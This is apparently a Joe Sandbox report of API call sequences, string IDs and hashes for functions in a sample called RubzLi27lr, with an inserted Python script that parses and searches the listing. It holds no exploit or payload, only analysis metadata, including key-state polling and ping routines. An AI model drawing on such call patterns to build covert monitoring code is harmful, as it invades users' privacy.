                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MessageSend$CharNext
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1350042424-0
                                                                                                                  • Opcode ID: 5e92654dbca236c127f585ed65696e127fdebb933fa4b6bf04d242b87c1d98ff
                                                                                                                  • Instruction ID: 31d6d3acef8d2c8a31d02942e364a0a252376462aa85441176cd546997c0d559
                                                                                                                  • Opcode Fuzzy Hash: 5e92654dbca236c127f585ed65696e127fdebb933fa4b6bf04d242b87c1d98ff
                                                                                                                  • Instruction Fuzzy Hash: 7B619274905A08EBDF209F54CC85AFE7BF9FB06720F108185F9259B292D7709B81EB60
                                                                                                                  APIs
                                                                                                                  • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00B0FAAF
                                                                                                                  • SafeArrayAllocData.OLEAUT32(?), ref: 00B0FB08
                                                                                                                  • VariantInit.OLEAUT32(?), ref: 00B0FB1A
                                                                                                                  • SafeArrayAccessData.OLEAUT32(?,?), ref: 00B0FB3A
                                                                                                                  • VariantCopy.OLEAUT32(?,?), ref: 00B0FB8D
                                                                                                                  • SafeArrayUnaccessData.OLEAUT32(?), ref: 00B0FBA1
                                                                                                                  • VariantClear.OLEAUT32(?), ref: 00B0FBB6
                                                                                                                  • SafeArrayDestroyData.OLEAUT32(?), ref: 00B0FBC3
                                                                                                                  • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00B0FBCC
                                                                                                                  • VariantClear.OLEAUT32(?), ref: 00B0FBDE
                                                                                                                  • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00B0FBE9
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2706829360-0
                                                                                                                  • Opcode ID: 613e4ab62b5d595b9b0337dd5de7a33286237560c7950f813a42511cf6df20e5
                                                                                                                  • Instruction ID: 872b4b8521dc07cb0ea2f25f909f6df8d08fe5d8720372193ce3f6432436ff81
                                                                                                                  • Opcode Fuzzy Hash: 613e4ab62b5d595b9b0337dd5de7a33286237560c7950f813a42511cf6df20e5
                                                                                                                  • Instruction Fuzzy Hash: A8413035A0121A9FCF10DF68D9549BDBFB9FF48754F008469E946A7261CB30AA45CFA0
                                                                                                                  APIs
                                                                                                                  • GetKeyboardState.USER32(?), ref: 00B19CA1
                                                                                                                  • GetAsyncKeyState.USER32(000000A0), ref: 00B19D22
                                                                                                                  • GetKeyState.USER32(000000A0), ref: 00B19D3D
                                                                                                                  • GetAsyncKeyState.USER32(000000A1), ref: 00B19D57
                                                                                                                  • GetKeyState.USER32(000000A1), ref: 00B19D6C
                                                                                                                  • GetAsyncKeyState.USER32(00000011), ref: 00B19D84
                                                                                                                  • GetKeyState.USER32(00000011), ref: 00B19D96
                                                                                                                  • GetAsyncKeyState.USER32(00000012), ref: 00B19DAE
                                                                                                                  • GetKeyState.USER32(00000012), ref: 00B19DC0
                                                                                                                  • GetAsyncKeyState.USER32(0000005B), ref: 00B19DD8
                                                                                                                  • GetKeyState.USER32(0000005B), ref: 00B19DEA
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: State$Async$Keyboard
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 541375521-0
                                                                                                                  • Opcode ID: 21c36d1bfab42d723f2d2c8e27524f4bcb845d3dc197949683b157226b9e3786
                                                                                                                  • Instruction ID: 59bd65785663238d63e3f445acd7a6d5b828f294de44ad852d7ed982eaf30cce
                                                                                                                  • Opcode Fuzzy Hash: 21c36d1bfab42d723f2d2c8e27524f4bcb845d3dc197949683b157226b9e3786
                                                                                                                  • Instruction Fuzzy Hash: 5241D8346047C969FF748764D4243F5BEE0FB12744F8880EADAC6575C2DBA49AC8C7A2
                                                                                                                  APIs
                                                                                                                  • WSAStartup.WSOCK32(00000101,?), ref: 00B305BC
                                                                                                                  • inet_addr.WSOCK32(?), ref: 00B3061C
                                                                                                                  • gethostbyname.WSOCK32(?), ref: 00B30628
                                                                                                                  • IcmpCreateFile.IPHLPAPI ref: 00B30636
                                                                                                                  • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00B306C6
                                                                                                                  • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00B306E5
                                                                                                                  • IcmpCloseHandle.IPHLPAPI(?), ref: 00B307B9
                                                                                                                  • WSACleanup.WSOCK32 ref: 00B307BF
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                                                                  • String ID: Ping
                                                                                                                  • API String ID: 1028309954-2246546115
                                                                                                                  • Opcode ID: 2a1bb9a1122cb9c76977aad11186d86d341ca72be7972f7ab0183f9ae5ca75e3
                                                                                                                  • Instruction ID: 1b3dd2fa7d30c4b5be0d1fdfa334ad71727ba10a3d4e25c623a9c1ebd17aab30
                                                                                                                  • Opcode Fuzzy Hash: 2a1bb9a1122cb9c76977aad11186d86d341ca72be7972f7ab0183f9ae5ca75e3
                                                                                                                  • Instruction Fuzzy Hash: 85919D34618201DFD320EF15C599F1ABBE4EF44318F2585A9F46A9B6A2CB30ED41CF91
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _wcslen$BuffCharLower
                                                                                                                  • String ID: cdecl$none$stdcall$winapi
                                                                                                                  • API String ID: 707087890-567219261
                                                                                                                  • Opcode ID: a0750c2a7a332898473d2d34d77205f4d7d7e555faee8cfa2ef270ed58d2ab5f
                                                                                                                  • Instruction ID: 366850dfc7dc0df230c273aa90de9c645bf8b98efc8632bc72e9337d958859a5
                                                                                                                  • Opcode Fuzzy Hash: a0750c2a7a332898473d2d34d77205f4d7d7e555faee8cfa2ef270ed58d2ab5f
                                                                                                                  • Instruction Fuzzy Hash: 0F517032A042269BCF14DF68C9908BEB7E5FF64720B3142A9F426A7285DB35DD44C791
                                                                                                                  APIs
                                                                                                                  • CoInitialize.OLE32 ref: 00B33774
                                                                                                                  • CoUninitialize.OLE32 ref: 00B3377F
                                                                                                                  • CoCreateInstance.OLE32(?,00000000,00000017,00B4FB78,?), ref: 00B337D9
                                                                                                                  • IIDFromString.OLE32(?,?), ref: 00B3384C
                                                                                                                  • VariantInit.OLEAUT32(?), ref: 00B338E4
                                                                                                                  • VariantClear.OLEAUT32(?), ref: 00B33936
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
                                                                                                                  • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                                                                  • API String ID: 636576611-1287834457
                                                                                                                  • Opcode ID: 4ca56e0b4b4d56f5e306a54eeed020249e3ba4045d1a3a8d398f758b841d9b08
                                                                                                                  • Instruction ID: 961d1d44511b20f45b3305c0f822fbdebe46ca2b04464ce4f32a9abaad236a18
                                                                                                                  • Opcode Fuzzy Hash: 4ca56e0b4b4d56f5e306a54eeed020249e3ba4045d1a3a8d398f758b841d9b08
                                                                                                                  • Instruction Fuzzy Hash: 19618074608301AFD310DF54C989F6BBBE8EF45B10F204999F5959B291DB70EE48CB92
                                                                                                                  APIs
                                                                                                                  • LoadStringW.USER32(00000066,?,00000FFF,?), ref: 00B233CF
                                                                                                                    • Part of subcall function 00AB9CB3: _wcslen.LIBCMT ref: 00AB9CBD
                                                                                                                  • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 00B233F0
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                   • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: LoadString$_wcslen
                                                                                                                  • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                                                                                                  • API String ID: 4099089115-3080491070
                                                                                                                  • Opcode ID: 7edcf02a6b77ad1d7a89115a1fbb643d06ab8509e44d1549afd603335d87e600
                                                                                                                  • Instruction ID: ad45ca541107d8c280a7e035237f2c24524d9961b0f561130586b819fa5ef365
                                                                                                                  • Opcode Fuzzy Hash: 7edcf02a6b77ad1d7a89115a1fbb643d06ab8509e44d1549afd603335d87e600
                                                                                                                  • Instruction Fuzzy Hash: 2A518F32800219BADF14EBA0DE56EEEB7FCEF14740F2040A5F10972062DB256F98DB61
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                   • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _wcslen$BuffCharUpper
                                                                                                                  • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                                                                                  • API String ID: 1256254125-769500911
                                                                                                                  • Opcode ID: dc05ec555caf2a413ac10a661a62e946088ee51725931945d5ea10ae8b519819
                                                                                                                  • Instruction ID: 9fa97facd278411505d6b1f5d3cc1a6d4b3a116a09f50fdc601db107e2460897
                                                                                                                  • Opcode Fuzzy Hash: dc05ec555caf2a413ac10a661a62e946088ee51725931945d5ea10ae8b519819
                                                                                                                  • Instruction Fuzzy Hash: F241E732A001269BCB105F7DC9909FEF7E5EB70794B6441A9E425D7284E731CDC1C790
                                                                                                                  APIs
                                                                                                                  • SetErrorMode.KERNEL32(00000001), ref: 00B253A0
                                                                                                                  • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00B25416
                                                                                                                  • GetLastError.KERNEL32 ref: 00B25420
                                                                                                                  • SetErrorMode.KERNEL32(00000000,READY), ref: 00B254A7
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                   • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Error$Mode$DiskFreeLastSpace
                                                                                                                  • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                                                                  • API String ID: 4194297153-14809454
                                                                                                                  • Opcode ID: fef2b958113aaa3dc31315f4b0bc9cb988cce49a72406d9147240d2760cf798e
                                                                                                                  • Instruction ID: 2f121229769ce868bb8d6d4b7d9cc5a5e9235d83d403fdc24d1643228d2b64d3
                                                                                                                  • Opcode Fuzzy Hash: fef2b958113aaa3dc31315f4b0bc9cb988cce49a72406d9147240d2760cf798e
                                                                                                                  • Instruction Fuzzy Hash: CA31E335A005149FD720EF68D484AEABBF4FF09305F1480A6E529CB396DB71DD86CB90
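The API bullets in these blocks (function, module, argument list, call-site address, and the optional "Part of subcall function" prefix) follow one line shape throughout the listing, so they can be parsed and searched, for instance for the SetErrorMode / GetDiskFreeSpaceW / SetErrorMode sequence of the block above, or grouped by the report's API ID to separate repeated runtime code from script-specific logic. The Python below is an added example written for this page, not Joe Sandbox code: its parser mirrors only the line shapes visible here (the layout of a non-empty Strings section is not shown on this page, so those bullets are kept verbatim), the sample input is two blocks copied from this report and shortened, and the record field names are the example's own.

```python
"""Parse the per-function blocks of a Joe Sandbox execution-graph listing
(the plain-text form on this page) and search the recovered API chains.
Added example, not Joe Sandbox code; field names are this example's own."""
from __future__ import annotations

import re
from dataclasses import dataclass, field
from typing import Optional

# Constructed input: two blocks copied from this report, shortened.
SAMPLE_BLOCKS = """\
APIs
• SetErrorMode.KERNEL32(00000001), ref: 00B253A0
• GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00B25416
• GetLastError.KERNEL32 ref: 00B25420
• SetErrorMode.KERNEL32(00000000,READY), ref: 00B254A7
Strings
Similarity
• API ID: Error$Mode$DiskFreeLastSpace
• String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
• Opcode ID: fef2b958113aaa3dc31315f4b0bc9cb988cce49a72406d9147240d2760cf798e
APIs
  • Part of subcall function 00AB9CB3: _wcslen.LIBCMT ref: 00AB9CBD
• SendMessageW.USER32(?,0000018C,000000FF,00020000), ref: 00B11F64
• GetDlgCtrlID.USER32 ref: 00B11F6F
Similarity
• API ID: MessageSend$CtrlParent$ClassName_wcslen
• String ID: ComboBox$ListBox
• Opcode ID: 16eb48e633d1ec040db123d81d9f94776fa2d2038a43d3cbd2cce88a3a6b88cc
"""
SECTION_HEADERS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
# "• Func.MODULE(args), ref: ADDR", optionally prefixed "Part of subcall function ADDR:";
# the argument list and the comma before "ref" are both optional in the listing.
API_RE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<func>\w+)\.(?P<mod>\w+)(?:\((?P<args>.*?)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)$")
KV_RE = re.compile(r"^•\s*(?P<key>[^:]+?):\s*(?P<val>.*)$")  # "• Key: value" bullets


@dataclass
class ApiCall:
    func: str
    module: str
    args: tuple[str, ...]
    ref: int                    # call-site address
    via_subcall: Optional[str]  # callee address when the API is only reached through a subcall


@dataclass
class FunctionBlock:
    calls: list[ApiCall] = field(default_factory=list)
    raw_strings: list[str] = field(default_factory=list)  # "Strings" bullets, kept verbatim
    fields: dict[str, str] = field(default_factory=dict)  # key/value bullets of the other sections

    @property
    def direct_calls(self) -> list[ApiCall]:
        return [c for c in self.calls if c.via_subcall is None]

    @property
    def string_ids(self) -> list[str]:
        # The report joins referenced strings with '$'; lossy if a string itself contains '$'.
        return [s for s in self.fields.get("String ID", "").split("$") if s]


def parse_blocks(text: str) -> list[FunctionBlock]:
    blocks: list[FunctionBlock] = []
    section = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line in SECTION_HEADERS:
            if line == "APIs":           # every block opens with its APIs header
                blocks.append(FunctionBlock())
            section = line
            continue
        if not blocks:
            continue                     # text before the first block
        blk = blocks[-1]
        if section == "APIs":
            if m := API_RE.match(line):
                args = tuple(a.strip() for a in m["args"].split(",")) if m["args"] else ()
                blk.calls.append(ApiCall(m["func"], m["mod"], args, int(m["ref"], 16), m["sub"]))
        elif section == "Strings":
            blk.raw_strings.append(line.lstrip("• ").strip())
        elif m := KV_RE.match(line):
            blk.fields[m["key"].strip()] = m["val"].strip()
    return blocks


def has_chain(block: FunctionBlock, chain: list[str]) -> bool:
    """True if the block's direct calls contain `chain` as an in-order subsequence."""
    it = iter(c.func for c in block.direct_calls)
    return all(want in it for want in chain)


def index_by_api_id(blocks: list[FunctionBlock]) -> dict[str, list[FunctionBlock]]:
    """Group blocks by API ID; one ID under several Opcode IDs is a candidate for shared runtime code."""
    idx: dict[str, list[FunctionBlock]] = {}
    for b in blocks:
        idx.setdefault(b.fields.get("API ID", ""), []).append(b)
    return idx
```

Calls reached only through a subcall are kept but excluded from `direct_calls`, so a chain search matches what the function itself invokes; `has_chain` accepts unrelated calls between the wanted ones (as GetLastError sits between GetDiskFreeSpaceW and the second SetErrorMode above).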
                                                                                                                  APIs
                                                                                                                  • CreateMenu.USER32 ref: 00B43C79
                                                                                                                  • SetMenu.USER32(?,00000000), ref: 00B43C88
                                                                                                                  • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00B43D10
                                                                                                                  • IsMenu.USER32(?), ref: 00B43D24
                                                                                                                  • CreatePopupMenu.USER32 ref: 00B43D2E
                                                                                                                  • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00B43D5B
                                                                                                                  • DrawMenuBar.USER32 ref: 00B43D63
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                   • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                                                                                                  • String ID: 0$F
                                                                                                                  • API String ID: 161812096-3044882817
                                                                                                                  • Opcode ID: 7e0d63a68daa8c4342992f0f68f23c16307f02ae461f4015cd2df8a7e20d8d5b
                                                                                                                  • Instruction ID: e2ecac6efb33da50ca3cd7a67d8c831f75fdad69031271b704919f4bb9f3b3d4
                                                                                                                  • Opcode Fuzzy Hash: 7e0d63a68daa8c4342992f0f68f23c16307f02ae461f4015cd2df8a7e20d8d5b
                                                                                                                  • Instruction Fuzzy Hash: DA416B79A02209AFDB14CF64D884AAE7BF5FF49750F180069F95697360DB30AA10DF90
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00AB9CB3: _wcslen.LIBCMT ref: 00AB9CBD
                                                                                                                    • Part of subcall function 00B13CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00B13CCA
                                                                                                                  • SendMessageW.USER32(?,0000018C,000000FF,00020000), ref: 00B11F64
                                                                                                                  • GetDlgCtrlID.USER32 ref: 00B11F6F
                                                                                                                  • GetParent.USER32 ref: 00B11F8B
                                                                                                                  • SendMessageW.USER32(00000000,?,00000111,?), ref: 00B11F8E
                                                                                                                  • GetDlgCtrlID.USER32(?), ref: 00B11F97
                                                                                                                  • GetParent.USER32(?), ref: 00B11FAB
                                                                                                                  • SendMessageW.USER32(00000000,?,00000111,?), ref: 00B11FAE
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                   • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MessageSend$CtrlParent$ClassName_wcslen
                                                                                                                  • String ID: ComboBox$ListBox
                                                                                                                  • API String ID: 711023334-1403004172
                                                                                                                  • Opcode ID: 16eb48e633d1ec040db123d81d9f94776fa2d2038a43d3cbd2cce88a3a6b88cc
                                                                                                                  • Instruction ID: 497bb49e0995e8dc7f3a6fba7398aa11d0e77af521d05e0a659db781eac716ad
                                                                                                                  • Opcode Fuzzy Hash: 16eb48e633d1ec040db123d81d9f94776fa2d2038a43d3cbd2cce88a3a6b88cc
                                                                                                                  • Instruction Fuzzy Hash: B521D074900218BFCF00AFA4CC849EEBFB8EF16300F508585BA65632A1DB7549498B60
                                                                                                                  APIs
                                                                                                                  • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00B43A9D
                                                                                                                  • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00B43AA0
                                                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00B43AC7
                                                                                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00B43AEA
                                                                                                                  • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00B43B62
                                                                                                                  • SendMessageW.USER32(?,00001074,00000000,00000007), ref: 00B43BAC
                                                                                                                  • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 00B43BC7
                                                                                                                  • SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 00B43BE2
                                                                                                                  • SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 00B43BF6
                                                                                                                  • SendMessageW.USER32(?,00001008,00000000,00000007), ref: 00B43C13
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                   • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MessageSend$LongWindow
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 312131281-0
                                                                                                                  • Opcode ID: bf22b2cadcbb284e120cfa506f4f36f7016e11a65d6646f4b70a1af1aab7000b
                                                                                                                  • Instruction ID: 096c359c7a225fb1dc16f544389d936012444f36983ca604d1933dfa75f2178e
                                                                                                                  • Opcode Fuzzy Hash: bf22b2cadcbb284e120cfa506f4f36f7016e11a65d6646f4b70a1af1aab7000b
                                                                                                                  • Instruction Fuzzy Hash: B7615A75900248AFDB10DFA8CC81EEE77F8EB09710F144199FA15A72A2D774AE46EF50
                                                                                                                  APIs
                                                                                                                  • _free.LIBCMT ref: 00AE2C94
